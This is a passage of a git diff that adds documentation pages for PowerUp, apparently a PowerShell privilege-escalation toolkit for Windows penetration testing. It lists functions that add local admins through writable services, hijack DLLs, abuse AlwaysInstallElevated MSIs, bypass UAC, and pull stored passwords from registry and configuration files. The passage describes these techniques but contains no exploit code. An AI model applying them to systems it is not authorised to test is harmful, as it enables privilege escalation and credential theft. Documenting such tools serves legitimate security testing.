+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Path
+Path to write the binary out to, defaults to 'service.exe' in the local directory.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: "$(Convert-Path .)\service.exe"
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerUp.ServiceBinary
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Privesc/Write-UserAddMSI.md b/docs/Privesc/Write-UserAddMSI.md
new file mode 100755
index 0000000..cac959d
--- /dev/null
+++ b/docs/Privesc/Write-UserAddMSI.md
@@ -0,0 +1,56 @@
+# Write-UserAddMSI
+
+## SYNOPSIS
+Writes out a precompiled MSI installer that prompts for a user/group addition.
+This function can be used to abuse Get-RegistryAlwaysInstallElevated.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: None
+
+## SYNTAX
+
+```
+Write-UserAddMSI [[-Path] ]
+```
+
+## DESCRIPTION
+Writes out a precompiled MSI installer that prompts for a user/group addition.
+This function can be used to abuse Get-RegistryAlwaysInstallElevated.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Write-UserAddMSI
+```
+
+Writes the user add MSI to the local directory.
+
+## PARAMETERS
+
+### -Path
+{{Fill Path Description}}
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ServiceName
+
+Required: False
+Position: 1
+Default value: UserAdd.msi
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerUp.UserAddMSI
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Privesc/index.md b/docs/Privesc/index.md
new file mode 100644
index 0000000..836e674
--- /dev/null
+++ b/docs/Privesc/index.md
@@ -0,0 +1,55 @@
+## PowerUp
+
+PowerUp aims to be a clearinghouse of common Windows privilege escalation
+vectors that rely on misconfigurations.
+
+Running Invoke-AllChecks will output any identifiable vulnerabilities along
+with specifications for any abuse functions. The -HTMLReport flag will also
+generate a COMPUTER.username.html version of the report.
+
+Author: @harmj0y
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
+
+
+### Token/Privilege Enumeration/Abuse:
+ Get-ProcessTokenGroup - returns all SIDs that the current token context is a part of, whether they are disabled or not
+ Get-ProcessTokenPrivilege - returns all privileges for the current (or specified) process ID
+ Enable-Privilege - enables a specific privilege for the current process
+
+### Service Enumeration/Abuse:
+ Test-ServiceDaclPermission - tests one or more passed services or service names against a given permission set
+ Get-UnquotedService - returns services with unquoted paths that also have a space in the name
+ Get-ModifiableServiceFile - returns services where the current user can write to the service binary path or its config
+ Get-ModifiableService - returns services the current user can modify
+ Get-ServiceDetail - returns detailed information about a specified service
+ Set-ServiceBinaryPath - sets the binary path for a service to a specified value
+ Invoke-ServiceAbuse - modifies a vulnerable service to create a local admin or execute a custom command
+ Write-ServiceBinary - writes out a patched C# service binary that adds a local admin or executes a custom command
+ Install-ServiceBinary - replaces a service binary with one that adds a local admin or executes a custom command
+ Restore-ServiceBinary - restores a replaced service binary with the original executable
+
+### DLL Hijacking:
+ Find-ProcessDLLHijack - finds potential DLL hijacking opportunities for currently running processes
+ Find-PathDLLHijack - finds service %PATH% DLL hijacking 
opportunities
+ Write-HijackDll - writes out a hijackable DLL
+
+### Registry Checks:
+ Get-RegistryAlwaysInstallElevated - checks if the AlwaysInstallElevated registry key is set
+ Get-RegistryAutoLogon - checks for Autologon credentials in the registry
+ Get-ModifiableRegistryAutoRun - checks for any modifiable binaries/scripts (or their configs) in HKLM autoruns
+
+### Miscellaneous Checks:
+ Get-ModifiableScheduledTaskFile - find schtasks with modifiable target files
+ Get-UnattendedInstallFile - finds remaining unattended installation files
+ Get-Webconfig - checks for any encrypted web.config strings
+ Get-ApplicationHost - checks for encrypted application pool and virtual directory passwords
+ Get-SiteListPassword - retrieves the plaintext passwords for any found McAfee's SiteList.xml files
+ Get-CachedGPPPassword - checks for passwords in cached Group Policy Preferences files
+
+### Other Helpers/Meta-Functions:
+ Get-ModifiablePath - tokenizes an input string and returns the files in it the current user can modify
+ Write-UserAddMSI - write out a MSI installer that prompts for a user to be added
+ Invoke-WScriptUACBypass - performs the bypass UAC attack by abusing the lack of an embedded manifest in wscript.exe
+ Invoke-PrivescAudit - runs all current escalation checks and returns a report (formerly Invoke-AllChecks)
diff --git a/docs/index.md b/docs/index.md
index 67ddcbc..8cd53ea 100644
--- a/docs/index.md
+++ b/docs/index.md
@@ -61,6 +61,7 @@ Cause general mayhem with PowerShell. Tools to help with escalating privileges on a target, including PowerUp. PowerUp - Clearing house of common privilege escalation checks, along with some weaponization vectors. + Get-System - GetSystem functionality inspired by Meterpreter's getsystem ### Recon Tools to aid in the reconnaissance phase of a penetration test, including PowerView.
diff --git a/mkdocs.yml b/mkdocs.yml
index accd72b..8b78d98 100644
--- a/mkdocs.yml
+++ b/mkdocs.yml
@@ -85,3 +85,37 @@ pages:
 - Get-HttpStatus: 'Recon/Get-HttpStatus.md'
 - Invoke-Portscan: 'Recon/Invoke-Portscan.md'
 - Invoke-ReverseDnsLookup: 'Recon/Invoke-ReverseDnsLookup.md'
+- Privesc:
+ - About: 'Privesc/index.md'
+ - Functions:
+ - Get-ModifiablePath: 'Privesc/Get-ModifiablePath.md'
+ - Get-ProcessTokenGroup: 'Privesc/Get-ProcessTokenGroup.md'
+ - Get-ProcessTokenPrivilege: 'Privesc/Get-ProcessTokenPrivilege.md'
+ - Enable-Privilege: 'Privesc/Enable-Privilege.md'
+ - Add-ServiceDacl: 'Privesc/Add-ServiceDacl.md'
+ - Set-ServiceBinaryPath: 'Privesc/Set-ServiceBinaryPath.md'
+ - Test-ServiceDaclPermission: 'Privesc/Test-ServiceDaclPermission.md'
+ - Get-UnquotedService: 'Privesc/Get-UnquotedService.md'
+ - Get-ModifiableServiceFile: 'Privesc/Get-ModifiableServiceFile.md'
+ - Get-ModifiableService: 'Privesc/Get-ModifiableService.md'
+ - Get-ServiceDetail: 'Privesc/Get-ServiceDetail.md'
+ - Invoke-ServiceAbuse: 'Privesc/Invoke-ServiceAbuse.md'
+ - Write-ServiceBinary: 'Privesc/Write-ServiceBinary.md'
+ - Install-ServiceBinary: 'Privesc/Install-ServiceBinary.md'
+ - Restore-ServiceBinary: 'Privesc/Restore-ServiceBinary.md'
+ - Find-ProcessDLLHijack: 'Privesc/Find-ProcessDLLHijack.md'
+ - Find-PathDLLHijack: 'Privesc/Find-PathDLLHijack.md'
+ - Write-HijackDll: 'Privesc/Write-HijackDll.md'
+ - Get-RegistryAlwaysInstallElevated: 'Privesc/Get-RegistryAlwaysInstallElevated.md'
+ - Get-RegistryAutoLogon: 'Privesc/Get-RegistryAutoLogon.md'
+ - Get-ModifiableRegistryAutoRun: 'Privesc/Get-ModifiableRegistryAutoRun.md'
+ - Get-ModifiableScheduledTaskFile: 'Privesc/Get-ModifiableScheduledTaskFile.md'
+ - Get-UnattendedInstallFile: 'Privesc/Get-UnattendedInstallFile.md'
+ - Get-WebConfig: 'Privesc/Get-WebConfig.md'
+ - Get-ApplicationHost: 'Privesc/Get-ApplicationHost.md'
+ - Get-SiteListPassword: 'Privesc/Get-SiteListPassword.md'
+ - Get-CachedGPPPassword: 'Privesc/Get-CachedGPPPassword.md'
+ - Write-UserAddMSI: 'Privesc/Write-UserAddMSI.md'
+ - Invoke-WScriptUACBypass: 
'Privesc/Invoke-WScriptUACBypass.md'
+ - Invoke-PrivescAudit: 'Privesc/Invoke-PrivescAudit.md'
+ - Get-System: 'Privesc/Get-System.md'
-- cgit v1.2.3